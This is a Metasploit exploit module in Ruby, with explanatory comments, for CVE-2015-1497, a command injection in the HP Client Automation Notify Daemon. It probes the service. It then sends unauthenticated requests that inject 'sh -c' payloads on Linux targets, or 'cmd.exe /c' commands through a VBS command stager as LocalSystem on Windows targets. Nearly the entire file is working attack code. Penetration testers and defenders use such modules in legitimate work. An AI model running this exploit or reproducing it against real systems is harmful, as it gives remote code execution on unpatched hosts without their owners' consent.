##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Module metadata and options.
  #
  # The targeted service is the HP Client Automation Notify Daemon
  # (radexecd.exe, default RPORT 3465), which per 'Description' does not
  # authenticate execution requests by default. The CmdStager flavor and
  # decoder options are deregistered because #exploit hard-codes the :vbs
  # flavor for the Windows target.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HP Client Automation Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability on HP Client Automation, distributed
          actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
          Daemon (radexecd.exe), which doesn't authenticate execution requests by default.

          This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2
          and CentOS 5.
        },
        'Author' => [
          'Ben Turner', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2015-1497'],
          ['ZDI', '15-038'],
          # Vendor guidance on securing the RBAC and Remote Notify features (mitigation reference).
          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
        ],
        'Privileged' => true,
        'Platform' => %w{unix win},
        'DefaultOptions' => {
          'WfsDelay' => 10
        },
        'Payload' => { 'DisableNops' => true },
        'Targets' => [
          [
            'HP Client Automation 9.0.0 / Linux',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'Space' => 466,
                'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
                'Compat' =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'openssl telnet generic gawk'
                },
                # 0x27 (single quote) is excluded because #exploit_unix wraps the payload in single quotes.
                'BadChars' => "\x27"
              }
            }
          ],
          [
            'HP Client Automation 9.0.0 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-01-02',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(3465)
      ]
    )

    # The flavor is fixed to :vbs in #exploit, so these CmdStager options are not user-tunable.
    deregister_options('CMDSTAGER::FLAVOR')
    deregister_options('CMDSTAGER::DECODER')
  end

  # Probes the Notify Daemon with a bare 'hide' request.
  #
  # The request is four NUL-terminated fields (port, user ID, password,
  # command); user ID and password are random strings. A reply whose first
  # byte is 0x00 yields CheckCode::Detected; no reply, or any other first
  # byte, yields CheckCode::Safe. The result is Detected rather than
  # Vulnerable: the probe only shows the service answers such a request,
  # it does not confirm command injection.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    connect
    sock.put("\x00") # port
    sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
    sock.put("hide\x00") # command
    res = sock.get_once
    disconnect

    # Only the leading status byte of the reply is inspected.
    if res && res.unpack('C')[0] == 0
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Entry point: dispatches on the selected target's platform.
  #
  # Windows targets go through the CmdStager mixin (VBS flavor, 290-byte
  # lines; the mixin drives #execute_command below). Unix targets send the
  # cmd payload directly via #exploit_unix. Any other platform value aborts
  # with Failure::NoTarget.
  def exploit
    case target['Platform']
    when 'win'
      print_status('Exploiting Windows target...')
      execute_cmdstager({ :flavor => :vbs, :linemax => 290 })
    when 'unix'
      print_status('Exploiting Linux target...')
      exploit_unix
    else
      fail_with(Failure::NoTarget, 'Invalid target')
    end
  end

  # Linux/Unix path: sends a single Notify request whose command field
  # carries the encoded cmd payload.
  #
  # Same four NUL-terminated fields as #check, with user ID "0" and a random
  # password. The command field is "hide hide", a tab, then `sh -c '<payload>'`;
  # each backslash in the encoded payload is doubled (the gsub replacement
  # "\\\\\\\\" produces two literal backslashes per match). Unlike #check and
  # #execute_command, no reply is read before disconnecting.
  def exploit_unix
    connect
    sock.put("\x00") # port
    sock.put("0\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
    disconnect
  end

  # CmdStager callback for the Windows target: runs +cmd+ through one
  # Notify request.
  #
  # Fields: port, user ID "S-1-5-18" (the well-known LocalSystem SID), a
  # random password, and a command field of `hide hide"<TAB>"cmd.exe /c <cmd>&"`.
  # The first byte of the reply must be 0x00; otherwise the stager is
  # aborted with Failure::Unknown.
  #
  # @param cmd [String] command line produced by the CmdStager
  # @param opts [Hash] accepted for CmdStager callback compatibility; unused here
  def execute_command(cmd, opts = {})
    connect
    sock.put("\x00") # port
    sock.put("S-1-5-18\x00") # user ID
    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
    res = sock.get_once
    disconnect
    # Only the leading status byte of the reply is checked, as in #check.
    unless res && res.unpack('C')[0] == 0
      fail_with(Failure::Unknown, "Something failed executing the stager...")
    end
  end
end